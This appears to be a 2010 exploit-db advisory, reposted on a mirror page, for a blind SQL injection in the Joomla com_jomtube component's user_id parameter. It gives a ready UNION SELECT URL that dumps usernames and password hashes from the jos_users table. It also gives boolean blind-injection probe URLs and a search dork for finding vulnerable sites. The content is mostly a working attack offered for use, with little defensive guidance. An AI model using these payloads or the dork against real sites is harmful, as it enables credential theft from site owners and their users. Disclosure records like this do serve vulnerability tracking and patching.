Joomla! Component com_jomtube – ‘user_id’ Blind SQL Injection

  • 作者: SixP4ck3r
    日期: 2010-07-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14434/
  • ===============================================================================
    Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection
    ===============================================================================
    
    Author: SixP4ck3r
    Email & msn : SixP4ck3r@Bolivia.com
    Date: 17 July 2010
    Critical Lvl: High
    Impact: Exposure of sensitive information
    Where : From Remote
    web		: http://foro.nbsecurity.net/
    Credits		: Diablada and caporal is Bolivian!
    Dork		: inurl:com_jomtube
    
    ---------------------------------------------------------------------------
    
    [Sofware afected info]
    Joomla Component (com_jomtube)
    [Download]
    http://www.jomtube.com/
    [Afected versions]
    All versions + 0 day
    
    ---------------------------------------------------------------------------
    
    [Exploting..Bug..Demo..]
    [insert valid user_id=n]
    
    http://example/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9
    
    ,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr
    
    om+jos_users--&option=com_jomtube
    
    [Blind SQL Injection]
    http://example/index.php?view=videos&type=member&user_id=62+and+1=1--&option=com_jomtube
    http://example/index.php?view=videos&type=member&user_id=62+and+1=0--&option=com_jomtube
    ---------------------------------------------------------------------------
    
    With R3gards,
    SixP4ck3r from Bolivia
    ___eof____